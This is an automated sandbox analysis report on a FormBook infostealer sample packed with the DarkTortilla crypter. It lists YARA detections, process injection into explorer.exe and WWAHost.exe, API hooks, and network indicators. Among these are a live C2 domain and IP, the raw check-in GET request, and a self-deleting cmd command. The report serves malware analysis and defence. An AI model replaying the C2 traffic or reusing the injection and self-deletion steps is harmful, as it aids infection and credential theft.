              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x2000 | 0xc3f14 | 0xc4000 | 4a12e596ab28f29d37899d16736d6481 | False | 0.7685497050382653 | SysEx File - | 7.1884613511282724 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc | 0xc6000 | 0x27c4 | 0x2800 | 7516a9b1aac8df57844f39d6116b399c | False | 0.9095703125 | data | 7.630042250772672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0xca000 | 0xc | 0x200 | d048457f8373a9d967e5c21369d0fda3 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
              RT_ICON | 0xc60e8 | 0x22e1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9793929891365214
              RT_GROUP_ICON | 0xc83cc | 0x14 | data | | | 1.2
              RT_VERSION | 0xc83e0 | 0x3e4 | data | | | 0.41767068273092367
              DLL | Import
              mscoree.dll | _CorExeMain
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              07/01/24-15:55:50.915978 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 1, 2024 15:55:50.909362078 CEST | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Jul 1, 2024 15:55:50.914287090 CEST | 80 | 49718 | 217.160.0.1 | 192.168.2.5
              Jul 1, 2024 15:55:50.915873051 CEST | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Jul 1, 2024 15:55:50.915977955 CEST | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Jul 1, 2024 15:55:50.920716047 CEST | 80 | 49718 | 217.160.0.1 | 192.168.2.5
              Jul 1, 2024 15:55:51.433768034 CEST | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Jul 1, 2024 15:55:51.439327002 CEST | 80 | 49718 | 217.160.0.1 | 192.168.2.5
              Jul 1, 2024 15:55:51.439853907 CEST | 49718 | 80 | 192.168.2.5 | 217.160.0.1
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 1, 2024 15:55:31.463967085 CEST | 50153 | 53 | 192.168.2.5 | 1.1.1.1
              Jul 1, 2024 15:55:31.479914904 CEST | 53 | 50153 | 1.1.1.1 | 192.168.2.5
              Jul 1, 2024 15:55:50.885555029 CEST | 65524 | 53 | 192.168.2.5 | 1.1.1.1
              Jul 1, 2024 15:55:50.906372070 CEST | 53 | 65524 | 1.1.1.1 | 192.168.2.5
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Jul 1, 2024 15:55:31.463967085 CEST | 192.168.2.5 | 1.1.1.1 | 0xd7ef | Standard query (0) | www.osthirmaker.com | A (IP address) | IN (0x0001) | false
              Jul 1, 2024 15:55:50.885555029 CEST | 192.168.2.5 | 1.1.1.1 | 0xe074 | Standard query (0) | www.nftees.tech | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jul 1, 2024 15:55:31.479914904 CEST | 1.1.1.1 | 192.168.2.5 | 0xd7ef | Name error (3) | www.osthirmaker.com | none | none | A (IP address) | IN (0x0001) | false
              Jul 1, 2024 15:55:50.906372070 CEST | 1.1.1.1 | 192.168.2.5 | 0xe074 | No error (0) | www.nftees.tech | | 217.160.0.1 | A (IP address) | IN (0x0001) | false
              • www.nftees.tech
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.5 | 49718 | 217.160.0.1 | 80 | 1028 | C:\Windows\explorer.exe
              Timestamp | Bytes transferred | Direction | Data
              Jul 1, 2024 15:55:50.915977955 CEST | 154 | OUT | GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1
              Host: www.nftees.tech
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:


              Code Manipulations

              Function Name | Hook Type | Active in Processes
              PeekMessageA | INLINE | explorer.exe
              PeekMessageW | INLINE | explorer.exe
              GetMessageW | INLINE | explorer.exe
              GetMessageA | INLINE | explorer.exe
              Function Name | Hook Type | New Data
              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE1
              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE1
              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE1
              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE1


              Target ID: 0
              Start time: 09:54:07
              Start date: 01/07/2024
              Path: C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase: 0xc00000
              File size: 814'080 bytes
              MD5 hash: 64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation: low
              Has exited: true

              Target ID: 3
              Start time: 09:54:18
              Start date: 01/07/2024
              Path: C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit): false
              Commandline: "C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase: 0xc00000
              File size: 814'080 bytes
              MD5 hash: 64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation: low
              Has exited: true

              Target ID: 4
              Start time: 09:54:20
              Start date: 01/07/2024
              Path: C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase: 0xc00000
              File size: 814'080 bytes
              MD5 hash: 64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: low
              Has exited: true

              Target ID: 7
              Start time: 09:54:53
              Start date: 01/07/2024
              Path: C:\Windows\explorer.exe
              Wow64 process (32bit): false
              Commandline: C:\Windows\Explorer.EXE
              Imagebase: 0x7ff674740000
              File size: 5'141'208 bytes
              MD5 hash: 662F4F92FDE3557E86D110526BB578D5
              Has elevated privileges: false
              Has administrator privileges: false
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation: high
              Has exited: false

              Target ID: 9
              Start time: 09:54:55
              Start date: 01/07/2024
              Path: C:\Windows\SysWOW64\WWAHost.exe
              Wow64 process (32bit): true
              Commandline: "C:\Windows\SysWOW64\WWAHost.exe"
              Imagebase: 0x120000
              File size: 886'080 bytes
              MD5 hash: 7C7EDAD5BDA9C34FD50C3A58429C90F0
              Has elevated privileges: false
              Has administrator privileges: false
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate
              Has exited:false

              Target ID:10
              Start time:09:54:59
              Start date:01/07/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase:0x790000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:09:54:59
              Start date:01/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true


                Execution Graph

                Execution Coverage:17.6%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:13.7%
                Total number of Nodes:117
                Total number of Limit Nodes:8
                execution_graph (rendered graph figure; node and edge data not reproduced). API calls referenced by graph nodes: WriteProcessMemory, CallWindowProcW, DeleteFileW, VirtualProtect, Wow64GetThreadContext, VirtualAllocEx, CreateProcessAsUserW, VirtualProtectEx, Wow64SetThreadContext, PostMessageW, ResumeThread.
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                • API String ID: 0-1821904394
                • Opcode ID: 739a44d97a517655a6140336b7f6daa7138adc4bdef75647b71abf526b1482f8
                • Instruction ID: 218b0f200fe8c4c741254ffdf675ee9102470766e0ed2237313ae6e2b8ef3962
                • Opcode Fuzzy Hash: 739a44d97a517655a6140336b7f6daa7138adc4bdef75647b71abf526b1482f8
                • Instruction Fuzzy Hash: 58924870A046099FCB14CF68C984AAEBBF2FF8A315F259559E445AB3A1DB30FD41CB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (ocq$(ocq$(ocq$,gq$,gq$,gq$,gq$Hgq
                • API String ID: 0-3581845439
                • Opcode ID: f72814a8b47d663cde12637a86af75da67675bebd99182b6a6a1ee5f047295d8
                • Instruction ID: da2b4535d22476334979c4c9c187b9e8e725dc92c124c68d87341d6f36d91ae7
                • Opcode Fuzzy Hash: f72814a8b47d663cde12637a86af75da67675bebd99182b6a6a1ee5f047295d8
                • Instruction Fuzzy Hash: 31A26E71A001198FCB14DF68C994AAEBBB6FF8E304F159069E455EB3A1DB34ED41CB90

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (gq$Hgq$Hgq$Hgq$Hgq$Hgq$Hgq$PHcq
                • API String ID: 0-1368273707
                • Opcode ID: 5185304a665fb7399e880b3e8a766f1a2a862de82b9d34b35d87c16237feb9f6
                • Instruction ID: e209716879a4cd55b90cef1d41dd3f715e5bf7910071a256e79c5510af87011b
                • Opcode Fuzzy Hash: 5185304a665fb7399e880b3e8a766f1a2a862de82b9d34b35d87c16237feb9f6
                • Instruction Fuzzy Hash: 0962CFB1B001158FDB18EB79C85466E7BA7EFC8320F2485A9E41ADB3A1DE34DD42C791

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41a0661564c38679c5d64fe6b3e22fcc6e5a6fe15aa86475de90855e986218f3
                • Instruction ID: bca6f8c0fe367c7411b80b3bedc57023c8ed16b1dd86fa78c7e167522dc960d3
                • Opcode Fuzzy Hash: 41a0661564c38679c5d64fe6b3e22fcc6e5a6fe15aa86475de90855e986218f3
                • Instruction Fuzzy Hash: 1EC3F870A11618CFCB18EF78EA9966CBBB2BB89301F4049E9D449A7354DF349E85CF41

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e3bd177f4f4077d018208003b3d6933e75d8c647424b0354ebdcc769bd595b3a
                • Instruction ID: 9f25660ab1e0c5df870e0b90765a5decea86a2c42c60fd13e22c878d3bacc12b
                • Opcode Fuzzy Hash: e3bd177f4f4077d018208003b3d6933e75d8c647424b0354ebdcc769bd595b3a
                • Instruction Fuzzy Hash: 40C3F870A11618CFCB18EF78EA9966CBBB2BB89301F4049E9D449A7354DF349E85CF41

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.2510069372.0000000007CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CD0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7cd0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 434ca6286a70951a312b06d9f724cef51f4d208bf8f346241f16378d8ebc33d2
                • Instruction ID: e64b9d6ccdcec3ba493598702ddadaf6afcb49f8063b3d60f38cfe177fb8c8e8
                • Opcode Fuzzy Hash: 434ca6286a70951a312b06d9f724cef51f4d208bf8f346241f16378d8ebc33d2
                • Instruction Fuzzy Hash: F6B3F970A11618CFCB18EF79DA896ACBBF2BB88301F4089E9D489A3254DF345D95CF51

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q!$Q!$$cq
                • API String ID: 0-1686694922
                • Opcode ID: 2b1458d107e9a786c8f385c7596766cec4c61c45489a9ce804df3017961f1b24
                • Instruction ID: f0c3ab1a5afd2138393565b603e24b5262031796ed178f64d610946d0a75ca69
                • Opcode Fuzzy Hash: 2b1458d107e9a786c8f385c7596766cec4c61c45489a9ce804df3017961f1b24
                • Instruction Fuzzy Hash: 0E7116B4E11209DFDB04CFA9D5996EEBFB2BF88300F20852AE40AAB354DB305945CF51

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: tu}s$tu}s${ :
                • API String ID: 0-3169588376
                • Opcode ID: 2207fbb81b660f9ccee0285fc3a4a8a9621ace0b771560e284e76bbdcfc02172
                • Instruction ID: 0e2e17a52c958d66438e03480022f060587f023bb2e22bf336d9ced012b0e104
                • Opcode Fuzzy Hash: 2207fbb81b660f9ccee0285fc3a4a8a9621ace0b771560e284e76bbdcfc02172
                • Instruction Fuzzy Hash: 805147B0E1521A8FDB44CF99C5845EEFBF1FF89210F24896AD415E7264E7309A41CB51

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 735f2820740cc07913dc570aae9c3e3ea8f7b666e1c64f5267a509fe9b91c8a0
                • Instruction ID: 9826828d6f058da83639edaf930af5832698c8424963a9f51cd77727c1b6a1f5
                • Opcode Fuzzy Hash: 735f2820740cc07913dc570aae9c3e3ea8f7b666e1c64f5267a509fe9b91c8a0
                • Instruction Fuzzy Hash: C8436F70E10619CBCB14FF78D98979DBBB5BB84305F4089E9D048A3258DF34AE88DB55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q+(i$Q+(i
                • API String ID: 0-3998099878
                • Opcode ID: ed6fc23cb5bd327f549d7a04c3b6fc8233f8d3ded8c774ac30bf9c0a61b193ab
                • Instruction ID: 5f8cd2ab5f1400a1ee4671ff3fcb8ff46d9caa3207275613e0b2634d4c6efbf1
                • Opcode Fuzzy Hash: ed6fc23cb5bd327f549d7a04c3b6fc8233f8d3ded8c774ac30bf9c0a61b193ab
                • Instruction Fuzzy Hash: 798120B0D11219CFCB44DFA9C994AEEBBB2BF89300F24852AD816BB354DB345946CF51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq$Tecq
                • API String ID: 0-2088518435
                • Opcode ID: 3bf43368add7305d5428e57cc1bc7251b996b5c55c2dbf15c0a540eba376a611
                • Instruction ID: e8afe7877f320d4368e0cedf04629d3ce60ad58898625447b889d8127b717857
                • Opcode Fuzzy Hash: 3bf43368add7305d5428e57cc1bc7251b996b5c55c2dbf15c0a540eba376a611
                • Instruction Fuzzy Hash: AE71B2B4E112198FDB08CFA9C994AEEFBB2FF89301F10852AD915AB354DB356905CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq$Tecq
                • API String ID: 0-2088518435
                • Opcode ID: d2907ffbe885151ef4c52e9e4d69bbdd9c9cc13fc26062015545386a3cadccae
                • Instruction ID: 26d5b5ce1e7f02753104baa8403fe57a0e0d707849b13863ae8ac49f01c1b154
                • Opcode Fuzzy Hash: d2907ffbe885151ef4c52e9e4d69bbdd9c9cc13fc26062015545386a3cadccae
                • Instruction Fuzzy Hash: A571D3B4E102098FCB08CFA9C994ADEFBB2FF89310F10852AD915AB354DB346905CF50
                APIs
                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07685E0B
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: ccaf7f7c84e45b640343bf582f5b0e5499c4cb52f4aa0292520cd1491c533ec5
                • Instruction ID: 216fa6968e1f41f50155762c28a4ec24582810a63426b567072d6467a0ba5a80
                • Opcode Fuzzy Hash: ccaf7f7c84e45b640343bf582f5b0e5499c4cb52f4aa0292520cd1491c533ec5
                • Instruction Fuzzy Hash: 7C5109B1D0021ADFCB25DF69C844BDDBBB5BF48310F0485AAE919B7250DB71AA89CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq
                • API String ID: 0-1122318316
                • Opcode ID: ead8aa6a3068195277598cea02225baca7abe9a8ec2eec2f092baf54b7fffadc
                • Instruction ID: 7575e4fbd182494dcfeb83f318e8777f98fc7c9dd2f5eb0bc7e9ebe16952fc50
                • Opcode Fuzzy Hash: ead8aa6a3068195277598cea02225baca7abe9a8ec2eec2f092baf54b7fffadc
                • Instruction Fuzzy Hash: 3502DC74E01218CFDB24DFA5C954B9EBBB2BF89301F2480A9D409AB365DB359D86CF11
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Tecq
                • API String ID: 0-1122318316
                • Opcode ID: 9eb3cd2d6007b0704d439bdafd6687fcdfbbaf14e9168ce7ee1efea05c263cdc
                • Instruction ID: 9d480d44340579254c6b99bc0c0e30623257a4f0730b93b97c6208888767fbc8
                • Opcode Fuzzy Hash: 9eb3cd2d6007b0704d439bdafd6687fcdfbbaf14e9168ce7ee1efea05c263cdc
                • Instruction Fuzzy Hash: F5F1CB74E01218CFDB24DFA5C954B9EBBB2BF89301F2090A9D409BB365DB359986DF10
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075686E3
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 848b6cafd49e7ee53d3161ffe3e091f53dbedf0230c9f2359de4eb2e8c3945ab
                • Instruction ID: 29f2c448b1da2545d956659a2b779270dc75281d4420a19d36a5fba04fe2784b
                • Opcode Fuzzy Hash: 848b6cafd49e7ee53d3161ffe3e091f53dbedf0230c9f2359de4eb2e8c3945ab
                • Instruction Fuzzy Hash: 854104B1E006098FEB18CFAAC8447DEFBF7AB88300F14C06AD518A7260EB345A55CF51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Q+(i
                • API String ID: 0-266234252
